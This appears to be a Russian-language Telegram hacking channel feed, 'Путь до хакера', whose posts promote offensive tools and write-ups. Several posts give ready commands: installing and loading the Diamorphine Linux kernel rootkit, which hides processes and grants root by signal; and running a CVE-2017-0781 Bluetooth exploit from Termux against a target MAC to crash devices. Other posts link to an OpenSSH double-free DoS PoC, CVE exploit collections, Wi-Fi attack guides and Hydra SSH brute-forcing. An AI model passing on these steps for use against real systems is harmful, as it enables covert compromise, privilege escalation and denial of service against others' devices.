Путь до хакера | Cyber security
Open in Telegram
По всем вопросам: @artrone Пул хэштегов: #райтап #hack_the_box #новости #CVE #полезные_материалы #литература #софт #termux
Show moreThe country is not specifiedTechnologies & Applications71 306
690
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
☠️Использование Wifite на практике☠️
Читать: https://teletype.in/@orch1d/nPZ9xy8f2TO
#софт #литература
Diamorphine — это руткит LKM для ядер Linux 2.6.x/3.x/4.x/5.x и ARM64.
Функции:
🪄При загрузке модуль запускается невидимым;
🪄Скрыть/показать любой процесс, отправив сигнал 31;
🪄Отправка сигнала 63 (любому pid) делает модуль (не)видимым;
🪄Отправка сигнала 64 (любому pid) делает данного пользователя root;
🪄Файлы или каталоги, начинающиеся с MAGIC_PREFIX, становятся невидимыми;
Установка:
git clone https://github.com/m0nad/Diamorphine cd Diamorphine make insmod diamorphine.ko (от рута)Подробнее: https://github.com/m0nad/Diamorphine #софт
CVE-2023-25136 Proof-of-Concept
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению
Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
🔥Супер полезный репозиторий на GitHub'e🔥
Коллекция списков, руководств, шпаргалок, блогов, лайфхаков, однострочников, cli/веб-инструментов и многого другого😎
Подробнее: https://github.com/trimstray/the-book-of-secret-knowledge
#полезные_материалы #литература
Гигантская коллекция почти каждого общедоступного CVE PoC
Подробнее: https://github.com/trickest/cve
#CVE #полезные_материалы #литература
Захват хэндшейка с помощью aircrack-ng на практике⭐️
Читать: https://teletype.in/@orch1d/Ul6B8h8nx_C
#полезные_материалы #литература
Nipe — это движок, разработанный на Perl, целью которого является сделать сеть Tor вашим сетевым шлюзом по умолчанию.
Nipe может направлять трафик с вашего компьютера в Интернет через сеть Tor, поэтому вы можете путешествовать по Интернету, занимая более жесткую позицию в отношении конфиденциальности и анонимности в киберпространстве.
Установка:
git clone https://github.com/htrgouvea/nipe && cd nipe cpanm --installdeps . perl nipe.pl install (от рута)Подробнее: https://github.com/htrgouvea/nipe #софт
Поиск поддоменов для захвата: пример на практике👾
Читать: https://teletype.in/@orch1d/_CvXn0rnFIq
#полезные_материалы #литература
SQLi для самых маленьких: простыми словами о не очень простых вещах🔥
Читать: https://teletype.in/@orch1d/82Ovc3wHhmt
P.S. попытался максимально подробно разжевать. Напишите, нужно ли так делать или это лишнее?
#литература #полезные_материалы
Получен root тачки Interface
Райтап на днях
#новости #hack_the_box
Просили показать пример использования mdk4 - получайте🤝
https://telegra.ph/Primery-ispolzovaniya-mdk4-02-11
#полезные_материалы
MDK4 - это инструмент тестирования Wi-Fi от E7mer из 360PegasusTeam, ASPj из k2wrlz, он использует библиотеку osdep library из проекта aircrack-ng для инъекции фреймов на нескольких операционных системах.
Более подробно: https://kali.tools/?p=4246
Github: https://github.com/aircrack-ng/mdk4
👉Кладем Bluetooth-устройство через Termux с помощью эксплойта👈
Установка:
apt install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install —upgrade pip
pip install —upgrade pwntools
apt-get install bluetooth libbluetooth-dev
pip install pybluez
git clone https://github.com/ojasookert/CVE-2017-0781.git
Использование
(❗️нужен MAC адрес❗️):
btmgmt —index 0
find
python CVE-2017-0781.py TARGET= (МАC ADDRESS)
P.S. сам не тестил, поэтому за работоспособность ничего говорить не буду
#софт #termuxОбщедоступная коллекция CVE и эксплойтов в студию🔥
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
Что бы вы хотели увидеть на канале?🤓
Пишите в комментариях👇🏻
#новости
В данной статье рассмотрим один из способов получения доступа к SSH с помощью Hydra, используя брутфорс по словарям👾
Читать: https://teletype.in/@orch1d/HqfCdPABu-y
